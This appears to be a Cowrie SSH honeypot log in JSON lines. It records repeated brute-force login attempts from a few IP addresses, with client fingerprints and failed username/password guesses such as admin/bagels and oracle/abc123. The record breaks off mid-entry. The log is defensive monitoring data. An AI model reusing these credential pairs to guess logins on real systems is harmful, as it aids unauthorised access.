{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:34.711895Z","src_ip":"212.227.125.160","session":"c40ca5cb29cf"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:35.931818Z","src_ip":"212.227.125.160","session":"c40ca5cb29cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38366,"dst_ip":"1.2.3.4","dst_port":22,"session":"23f55adbbe1c","protocol":"ssh","message":"New connection: 212.227.235.229:38366 (1.2.3.4:22) [session: 23f55adbbe1c]","sensor":"my-vps","timestamp":"2025-08-28T06:53:40.347105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:53:40.348210Z","src_ip":"212.227.235.229","session":"23f55adbbe1c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:53:40.594438Z","src_ip":"212.227.235.229","session":"23f55adbbe1c"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:41.335804Z","src_ip":"212.227.235.229","session":"23f55adbbe1c"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:42.585192Z","src_ip":"212.227.235.229","session":"23f55adbbe1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59908,"dst_ip":"1.2.3.4","dst_port":22,"session":"780349f9e56f","protocol":"ssh","message":"New connection: 212.227.125.160:59908 (1.2.3.4:22) [session: 780349f9e56f]","sensor":"my-vps","timestamp":"2025-08-28T06:53:50.193078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:53:50.220032Z","src_ip":"212.227.125.160","session":"780349f9e56f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:53:50.411558Z","src_ip":"212.227.125.160","session":"780349f9e56f"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:51.271587Z","src_ip":"212.227.125.160","session":"780349f9e56f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:52.489049Z","src_ip":"212.227.125.160","session":"780349f9e56f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40838,"dst_ip":"1.2.3.4","dst_port":22,"session":"e76331c7ff1e","protocol":"ssh","message":"New connection: 212.227.235.229:40838 (1.2.3.4:22) [session: e76331c7ff1e]","sensor":"my-vps","timestamp":"2025-08-28T06:53:56.744623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:53:56.745380Z","src_ip":"212.227.235.229","session":"e76331c7ff1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:53:56.995952Z","src_ip":"212.227.235.229","session":"e76331c7ff1e"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-28T06:53:57.747285Z","src_ip":"212.227.235.229","session":"e76331c7ff1e"}
{"eventid":"cowrie.session.closed","duration":31.276930809020996,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:58.003651Z","src_ip":"8.222.212.69","session":"944ad572124a"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:53:58.999457Z","src_ip":"212.227.235.229","session":"e76331c7ff1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34814,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f826ca3c5b8","protocol":"ssh","message":"New connection: 212.227.125.160:34814 (1.2.3.4:22) [session: 6f826ca3c5b8]","sensor":"my-vps","timestamp":"2025-08-28T06:54:06.709057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:54:06.724976Z","src_ip":"212.227.125.160","session":"6f826ca3c5b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:54:06.934324Z","src_ip":"212.227.125.160","session":"6f826ca3c5b8"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:07.811636Z","src_ip":"212.227.125.160","session":"6f826ca3c5b8"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:54:09.033059Z","src_ip":"212.227.125.160","session":"6f826ca3c5b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56378,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b5907304d70","protocol":"ssh","message":"New connection: 212.227.235.229:56378 (1.2.3.4:22) [session: 4b5907304d70]","sensor":"my-vps","timestamp":"2025-08-28T06:54:13.383285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:54:13.384170Z","src_ip":"212.227.235.229","session":"4b5907304d70"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:54:13.636330Z","src_ip":"212.227.235.229","session":"4b5907304d70"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:14.397514Z","src_ip":"212.227.235.229","session":"4b5907304d70"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:54:15.651855Z","src_ip":"212.227.235.229","session":"4b5907304d70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49432,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9fc91466da2","protocol":"ssh","message":"New connection: 212.227.125.160:49432 (1.2.3.4:22) [session: a9fc91466da2]","sensor":"my-vps","timestamp":"2025-08-28T06:54:23.360940Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:54:23.362364Z","src_ip":"212.227.125.160","session":"a9fc91466da2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:54:23.580006Z","src_ip":"212.227.125.160","session":"a9fc91466da2"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:24.229133Z","src_ip":"212.227.125.160","session":"a9fc91466da2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21741,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb5f51104261","protocol":"ssh","message":"New connection: 212.227.235.229:21741 (1.2.3.4:22) [session: bb5f51104261]","sensor":"my-vps","timestamp":"2025-08-28T06:54:25.381133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:54:25.381862Z","src_ip":"212.227.235.229","session":"bb5f51104261"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:54:25.447246Z","src_ip":"212.227.125.160","session":"a9fc91466da2"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:54:25.489477Z","src_ip":"212.227.235.229","session":"bb5f51104261"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beaks","message":"login attempt [admin/beaks] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:26.000499Z","src_ip":"212.227.235.229","session":"bb5f51104261"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bdfyjdf","message":"login attempt [admin/bdfyjdf] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:27.110316Z","src_ip":"212.227.235.229","session":"bb5f51104261"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bassbass","message":"login attempt [admin/bassbass] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:28.224097Z","src_ip":"212.227.235.229","session":"bb5f51104261"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bartok","message":"login attempt [admin/bartok] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:29.333467Z","src_ip":"212.227.235.229","session":"bb5f51104261"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47644,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8ac2a173730","protocol":"ssh","message":"New connection: 212.227.235.229:47644 (1.2.3.4:22) [session: b8ac2a173730]","sensor":"my-vps","timestamp":"2025-08-28T06:54:29.905511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:54:29.906144Z","src_ip":"212.227.235.229","session":"b8ac2a173730"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:54:30.157584Z","src_ip":"212.227.235.229","session":"b8ac2a173730"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bagels","message":"login attempt [admin/bagels] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:30.442185Z","src_ip":"212.227.235.229","session":"bb5f51104261"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"abc123","message":"login attempt [oracle/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:30.911079Z","src_ip":"212.227.235.229","session":"b8ac2a173730"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:54:31.551760Z","src_ip":"212.227.235.229","session":"bb5f51104261"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:54:32.163663Z","src_ip":"212.227.235.229","session":"b8ac2a173730"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56578,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b99a8335a06","protocol":"ssh","message":"New connection: 212.227.125.160:56578 (1.2.3.4:22) [session: 3b99a8335a06]","sensor":"my-vps","timestamp":"2025-08-28T06:54:40.052918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:54:40.055855Z","src_ip":"212.227.125.160","session":"3b99a8335a06"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:54:40.271990Z","src_ip":"212.227.125.160","session":"3b99a8335a06"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:41.156106Z","src_ip":"212.227.125.160","session":"3b99a8335a06"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:54:42.376706Z","src_ip":"212.227.125.160","session":"3b99a8335a06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40680,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f29e9580db3","protocol":"ssh","message":"New connection: 212.227.235.229:40680 (1.2.3.4:22) [session: 7f29e9580db3]","sensor":"my-vps","timestamp":"2025-08-28T06:54:46.643039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:54:46.643990Z","src_ip":"212.227.235.229","session":"7f29e9580db3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa